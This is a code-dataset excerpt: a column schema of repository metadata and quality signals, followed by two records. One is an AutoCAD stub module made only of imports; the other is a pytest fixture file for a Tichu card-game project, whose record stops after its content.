Schema (one row per source file; column name and dtype):

| column | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
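The `qsc_*` signals are derived from `content`. As a rough illustration of what several of the simpler columns plausibly measure, here is a minimal sketch; the exact tokenization and definitions used to produce this table are not specified here, so treat these as approximations rather than the pipeline's implementation.

```python
# Plausible re-implementations of a few content-derived columns.
# These are assumptions from the column names alone, not the actual
# definitions used to compute the table below.

def avg_line_length(content: str) -> float:
    """Mean characters per line (cf. avg_line_length)."""
    lines = content.splitlines()
    return sum(len(line) for line in lines) / max(len(lines), 1)

def max_line_length(content: str) -> int:
    """Length of the longest line (cf. max_line_length)."""
    return max((len(line) for line in content.splitlines()), default=0)

def alphanum_fraction(content: str) -> float:
    """Fraction of alphanumeric characters (cf. alphanum_fraction)."""
    return sum(c.isalnum() for c in content) / max(len(content), 1)

def frac_chars_whitespace(content: str) -> float:
    """Fraction of whitespace characters
    (cf. qsc_code_frac_chars_whitespace_quality_signal)."""
    return sum(c.isspace() for c in content) / max(len(content), 1)

def frac_words_unique(content: str) -> float:
    """Unique words over total words
    (cf. qsc_code_frac_words_unique_quality_signal)."""
    words = content.split()
    return len(set(words)) / max(len(words), 1)
```

Run on a row's `content`, these should land close to, but not necessarily exactly on, the tabulated values, since the real tokenizer and edge-case handling are unknown.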
**Record 1**

- hexsha: b48b9a465a40ad938627cb3aff48b3fbd10b5d75
- size: 9,386
- ext: py
- lang: Python
- max_stars_repo_path: extensions/.stubs/clrclasses/Autodesk/AutoCAD/Windows/Data/__init__.py
- max_stars_repo_name: vicwjb/Pycad
- max_stars_repo_head_hexsha: 7391cd694b7a91ad9f9964ec95833c1081bc1f84
- max_stars_repo_licenses: ["MIT"]
- max_stars_count: 1
- max_stars_repo_stars_event_min_datetime: 2020-03-25T03:27:24.000Z
- max_stars_repo_stars_event_max_datetime: 2020-03-25T03:27:24.000Z
- max_issues_repo_path: extensions/.stubs/clrclasses/Autodesk/AutoCAD/Windows/Data/__init__.py
- max_issues_repo_name: vicwjb/Pycad
- max_issues_repo_head_hexsha: 7391cd694b7a91ad9f9964ec95833c1081bc1f84
- max_issues_repo_licenses: ["MIT"]
- max_issues_count: null
- max_issues_repo_issues_event_min_datetime: null
- max_issues_repo_issues_event_max_datetime: null
- max_forks_repo_path: extensions/.stubs/clrclasses/Autodesk/AutoCAD/Windows/Data/__init__.py
- max_forks_repo_name: vicwjb/Pycad
- max_forks_repo_head_hexsha: 7391cd694b7a91ad9f9964ec95833c1081bc1f84
- max_forks_repo_licenses: ["MIT"]
- max_forks_count: null
- max_forks_repo_forks_event_min_datetime: null
- max_forks_repo_forks_event_max_datetime: null
- content:

```python
import __clrclasses__.Autodesk.AutoCAD.Windows.Data.Render as Render
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import AnimationEditor
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import AttachmentPointCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import AutoCompleteList
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import AutoCompleteToolTipService
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import AutoCorrectList
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import AutoCorrectorService
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import AutoCorrectType
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import BackgroundMaskCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import BlockEditor
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CellStyleConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CharacterSetCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ClearLineSpaceCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CloseCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CMLContentSearchPreviews
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ColorCollection
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ColorCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ColorSetting
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ColorToNamedValueConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ColumnsSettingsDialogCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import Command
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CommandCompletionType
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CommandEditor
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CommandEditorManager
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CommandHistory
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CommandLineItem
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CommandStack
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CommonProperties
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CommonProperty
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CompositeConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ContentSearchCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import DataBindings
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import DataItemCollection
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import DataItemCollections
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import DataItemFactoryMethod
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import DbObjectCollection
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import DefinedSymbolsCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import DisposingEventHandler
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import DoubleToStringConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import EffectiveProperties
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import EffectiveProperty
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import EffectivePropertySource
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import EnumItemCollection
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import EnumSubsetConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import EplotExport
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import Expression
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ExtendedPropertyEventArgs
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ExtendedPropertyEventHandler
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ExtendedPropertyManager
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import FieldDialogCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import FindReplaceCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import FindTextCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import GeoData
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import HatchCommands
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import HatchPatterns
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IDataItem
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IDataItemTransaction
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IInvalidateProperty
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ILookup
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ImportCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import INamedImageProvider
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import INamedValue
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import INotifyCollectionItemsChanged
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import InplaceTextEditor
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import InputBuffer
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import InputSearchOptions
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import Int32ToImageConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IPEAttachmentPoint
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IPEColumnType
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IPECommandBase
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IPEDynamicColumnType
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IPEEditorSettings
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IPENumberingType
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IPENumberingTypeEnumConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IPEParagraphAlignmentType
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IPEStaticColumnType
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IsoDraft
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import LayerFilterCollection
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import LayerRecordCollection
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import LightEngine
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import LineSpacingMultiplesCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import LineSpacingTypes
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import LineSpacingTypesEnumConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import LineWeightCollection
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import LowercaseCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import MoreLineSpaceCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import MultiReplaceConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import NamedImageProvider
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import NamedObjectCollection
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import NativeFunction
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import NavStatus
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import NotifyCollectionItemsChangedEventArgs
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import NotifyCollectionItemsChangedEventHandler
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import NullToVariesConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import NumberingCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import OptionsCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ParagraphAlignmentOpionsCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ParagraphDialogCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import PatPatternCategory
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import PlotStyleCollection
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import PlotStyleNameToDataItemConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import PromptAndInput
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import RedoCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import RenderPresetConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ReplaceConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import Selection
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import SourceToTypeConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import StandardConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import StandardUcsPlane
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import StaticColumnsCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import SubEntity
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import SystemVariable
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import SysvarMonitorState
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import TextSize
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ThemeEngine
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import TransparencyItem
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import TrueValues
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import UIFontInfo
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import UndoCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import UppercaseCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ValueToNamedValueConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import View2DRibbonItemData
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import Views2DCommands
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import WorkspaceCollection
```

- avg_line_length: 75.088
- max_line_length: 97
- alphanum_fraction: 0.894204
- qsc_code_num_words_quality_signal: 993
- qsc_code_num_chars_quality_signal: 9,386
- qsc_code_mean_word_length_quality_signal: 7.952669
- qsc_code_frac_words_unique_quality_signal: 0.132931
- qsc_code_frac_chars_top_2grams_quality_signal: 0.282639
- qsc_code_frac_chars_top_3grams_quality_signal: 0.392554
- qsc_code_frac_chars_top_4grams_quality_signal: 0.502469
- qsc_code_frac_chars_dupe_5grams_quality_signal: 0.721033
- qsc_code_frac_chars_dupe_6grams_quality_signal: 0.716475
- qsc_code_frac_chars_dupe_7grams_quality_signal: 0.716475
- qsc_code_frac_chars_dupe_8grams_quality_signal: 0
- qsc_code_frac_chars_dupe_9grams_quality_signal: 0
- qsc_code_frac_chars_dupe_10grams_quality_signal: 0
- qsc_code_frac_chars_replacement_symbols_quality_signal: 0
- qsc_code_frac_chars_digital_quality_signal: 0.00045
- qsc_code_frac_chars_whitespace_quality_signal: 0.052845
- qsc_code_size_file_byte_quality_signal: 9,386
- qsc_code_num_lines_quality_signal: 124
- qsc_code_num_chars_line_max_quality_signal: 98
- qsc_code_num_chars_line_mean_quality_signal: 75.693548
- qsc_code_frac_chars_alphabet_quality_signal: 0.887852
- qsc_code_frac_chars_comments_quality_signal: 0
- qsc_code_cate_xml_start_quality_signal: 0
- qsc_code_frac_lines_dupe_lines_quality_signal: 0
- qsc_code_cate_autogen_quality_signal: 0
- qsc_code_frac_lines_long_string_quality_signal: 0
- qsc_code_frac_chars_string_length_quality_signal: 0
- qsc_code_frac_chars_long_word_length_quality_signal: 0
- qsc_code_frac_lines_string_concat_quality_signal: 0
- qsc_code_cate_encoded_data_quality_signal: 0
- qsc_code_frac_chars_hex_words_quality_signal: 0
- qsc_code_frac_lines_prompt_comments_quality_signal: 0
- qsc_code_frac_lines_assert_quality_signal: 0
- qsc_codepython_cate_ast_quality_signal: 1
- qsc_codepython_frac_lines_func_ratio_quality_signal: 0
- qsc_codepython_cate_var_zero_quality_signal: true
- qsc_codepython_frac_lines_pass_quality_signal: 0
- qsc_codepython_frac_lines_import_quality_signal: 1
- qsc_codepython_frac_lines_simplefunc_quality_signal: 0
- qsc_codepython_score_lines_no_logic_quality_signal: 1
- qsc_codepython_frac_lines_print_quality_signal: 0
- qsc_code_num_words: 0
- qsc_code_num_chars: 0
- qsc_code_mean_word_length: 0
- qsc_code_frac_words_unique: null
- qsc_code_frac_chars_top_2grams: 1
- qsc_code_frac_chars_top_3grams: 1
- qsc_code_frac_chars_top_4grams: 1
- qsc_code_frac_chars_dupe_5grams: 0
- qsc_code_frac_chars_dupe_6grams: 1
- qsc_code_frac_chars_dupe_7grams: 1
- qsc_code_frac_chars_dupe_8grams: 0
- qsc_code_frac_chars_dupe_9grams: 0
- qsc_code_frac_chars_dupe_10grams: 0
- qsc_code_frac_chars_replacement_symbols: 0
- qsc_code_frac_chars_digital: 0
- qsc_code_frac_chars_whitespace: 0
- qsc_code_size_file_byte: 0
- qsc_code_num_lines: 0
- qsc_code_num_chars_line_max: 0
- qsc_code_num_chars_line_mean: 0
- qsc_code_frac_chars_alphabet: 0
- qsc_code_frac_chars_comments: 0
- qsc_code_cate_xml_start: 0
- qsc_code_frac_lines_dupe_lines: 0
- qsc_code_cate_autogen: 0
- qsc_code_frac_lines_long_string: 0
- qsc_code_frac_chars_string_length: 0
- qsc_code_frac_chars_long_word_length: 0
- qsc_code_frac_lines_string_concat: null
- qsc_code_cate_encoded_data: 0
- qsc_code_frac_chars_hex_words: 0
- qsc_code_frac_lines_prompt_comments: 0
- qsc_code_frac_lines_assert: 0
- qsc_codepython_cate_ast: 0
- qsc_codepython_frac_lines_func_ratio: 0
- qsc_codepython_cate_var_zero: 1
- qsc_codepython_frac_lines_pass: 0
- qsc_codepython_frac_lines_import: 1
- qsc_codepython_frac_lines_simplefunc: 0
- qsc_codepython_score_lines_no_logic: 0
- qsc_codepython_frac_lines_print: 0
- effective: 0
- hits: 7
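Rows like this one are typically consumed by filtering on the quality signals. A minimal sketch, assuming the rows are exported as JSON Lines keyed by the schema's column names; the file name and thresholds are hypothetical, not the dataset's actual filtering rules.

```python
import json

def keep(row: dict) -> bool:
    # Hypothetical thresholds for illustration only.
    return (
        row["qsc_codepython_cate_ast_quality_signal"] == 1      # plausibly: file parses
        and row["qsc_code_cate_autogen_quality_signal"] == 0    # plausibly: not auto-generated
        and row["qsc_code_frac_chars_dupe_5grams_quality_signal"] < 0.9
    )

with open("rows.jsonl") as f:          # hypothetical export of this table
    rows = [json.loads(line) for line in f]

kept = [r for r in rows if keep(r)]
print(f"kept {len(kept)} of {len(rows)} rows")
```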
**Record 2**

- hexsha: c30c0c1445e9826855b84d6f759a165da02d08a0
- size: 11,545
- ext: py
- lang: Python
- max_stars_repo_path: tests/conftest.py
- max_stars_repo_name: alxwdm/TichuAgent
- max_stars_repo_head_hexsha: d498d1050264d13c920018006e3dcc2a04bc61df
- max_stars_repo_licenses: ["MIT"]
- max_stars_count: null
- max_stars_repo_stars_event_min_datetime: null
- max_stars_repo_stars_event_max_datetime: null
- max_issues_repo_path: tests/conftest.py
- max_issues_repo_name: alxwdm/TichuAgent
- max_issues_repo_head_hexsha: d498d1050264d13c920018006e3dcc2a04bc61df
- max_issues_repo_licenses: ["MIT"]
- max_issues_count: null
- max_issues_repo_issues_event_min_datetime: null
- max_issues_repo_issues_event_max_datetime: null
- max_forks_repo_path: tests/conftest.py
- max_forks_repo_name: alxwdm/TichuAgent
- max_forks_repo_head_hexsha: d498d1050264d13c920018006e3dcc2a04bc61df
- max_forks_repo_licenses: ["MIT"]
- max_forks_count: null
- max_forks_repo_forks_event_min_datetime: null
- max_forks_repo_forks_event_max_datetime: null
- content:

```python
# pytest test cases configuration file
import pytest
from env.card import Card
from env.cards import Cards
from env.player import Player
# define pytest fixtures
# class Card test fixtures
# 2
@pytest.fixture(scope='session', autouse='True')
def Spd_2():
return Card(name='2', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_2():
return Card(name='2', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_2():
return Card(name='2', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_2():
return Card(name='2', suit='Club')
#3
@pytest.fixture(scope='session', autouse='True')
def Spd_3():
return Card(name='3', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_3():
return Card(name='3', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_3():
return Card(name='3', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_3():
return Card(name='3', suit='Club')
# 4
@pytest.fixture(scope='session', autouse='True')
def Spd_4():
return Card(name='4', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_4():
return Card(name='4', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_4():
return Card(name='4', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_4():
return Card(name='4', suit='Club')
# 5
@pytest.fixture(scope='session', autouse='True')
def Spd_5():
return Card(name='5', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_5():
return Card(name='5', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_5():
return Card(name='5', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_5():
return Card(name='5', suit='Club')
# 6
@pytest.fixture(scope='session', autouse='True')
def Spd_6():
return Card(name='6', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_6():
return Card(name='6', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_6():
return Card(name='6', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_6():
return Card(name='6', suit='Club')
# 7
@pytest.fixture(scope='session', autouse='True')
def Spd_7():
return Card(name='7', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_7():
return Card(name='7', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_7():
return Card(name='7', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_7():
return Card(name='7', suit='Club')
# 8
@pytest.fixture(scope='session', autouse='True')
def Spd_8():
return Card(name='8', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_8():
return Card(name='8', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_8():
return Card(name='8', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_8():
return Card(name='8', suit='Club')
# 9
@pytest.fixture(scope='session', autouse='True')
def Spd_9():
return Card(name='9', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_9():
return Card(name='9', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_9():
return Card(name='9', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_9():
return Card(name='9', suit='Club')
# 10
@pytest.fixture(scope='session', autouse='True')
def Spd_10():
return Card(name='10', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_10():
return Card(name='10', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_10():
return Card(name='10', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_10():
return Card(name='10', suit='Club')
# J
@pytest.fixture(scope='session', autouse='True')
def Spd_J():
return Card(name='J', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_J():
return Card(name='J', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_J():
return Card(name='J', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_J():
return Card(name='J', suit='Club')
# Q
@pytest.fixture(scope='session', autouse='True')
def Spd_Q():
return Card(name='Q', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_Q():
return Card(name='Q', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_Q():
return Card(name='Q', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_Q():
return Card(name='Q', suit='Club')
# K
@pytest.fixture(scope='session', autouse='True')
def Spd_K():
return Card(name='K', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_K():
return Card(name='K', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_K():
return Card(name='K', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_K():
return Card(name='K', suit='Club')
# A
@pytest.fixture(scope='session', autouse='True')
def Spd_A():
return Card(name='A', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_A():
return Card(name='A', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_A():
return Card(name='A', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_A():
return Card(name='A', suit='Club')
# Special
@pytest.fixture(scope='session', autouse='True')
def Majong():
return Card(name='Majong', suit='Special')
@pytest.fixture(scope='session', autouse='True')
def Dog():
return Card(name='Dog', suit='Special')
@pytest.fixture(scope='session', autouse='True')
def Phoenix():
return Card(name='Phoenix', suit='Special')
@pytest.fixture(scope='session', autouse='True')
def Dragon():
return Card(name='Dragon', suit='Special')
# class Cards test fixtures
@pytest.fixture(scope='session', autouse='True')
def hand_0(Spd_10, Hrt_10, Dia_2, Phoenix, Dragon, Clb_K, Dia_J, Clb_J):
return Cards([Spd_10, Hrt_10, Dia_2, Phoenix, Dragon, Clb_K, Dia_J, Clb_J])
@pytest.fixture(scope='session', autouse='True')
def hand_1(Clb_J, Dia_J, Phoenix, Dog):
return Cards([Clb_J, Dia_J, Phoenix, Dog])
@pytest.fixture(scope='session', autouse='True')
def hand_2(Clb_J, Dia_J, Phoenix, Dragon):
return Cards([Clb_J, Dia_J, Phoenix, Dragon])
@pytest.fixture(scope='session', autouse='True')
def hand_3(Clb_J, Clb_10, Spd_K, Hrt_K, Clb_Q, Dia_Q):
return Cards([Clb_J, Clb_10, Spd_K, Hrt_K, Clb_Q, Dia_Q])
@pytest.fixture(scope='session', autouse='True')
def hand_4(Clb_2, Hrt_2, Spd_3, Phoenix, Clb_5, Dia_5, Clb_6, Dia_6):
return Cards([Clb_2, Hrt_2, Spd_3, Phoenix, Clb_5, Dia_5, Clb_6, Dia_6])
@pytest.fixture(scope='session', autouse='True')
def hand_5(Clb_2, Phoenix, Spd_4, Clb_4):
return Cards([Clb_2, Phoenix, Spd_4, Clb_4])
@pytest.fixture(scope='session', autouse='True')
def hand_6(Majong, Dog, Clb_2, Clb_3, Hrt_4, Phoenix, Dragon, Spd_K, Dia_K, Hrt_K, Clb_A, Hrt_A):
return Cards([Majong, Dog, Clb_2, Clb_3, Hrt_4, Phoenix, Dragon, Spd_K, Dia_K, Hrt_K, Clb_A, Hrt_A])
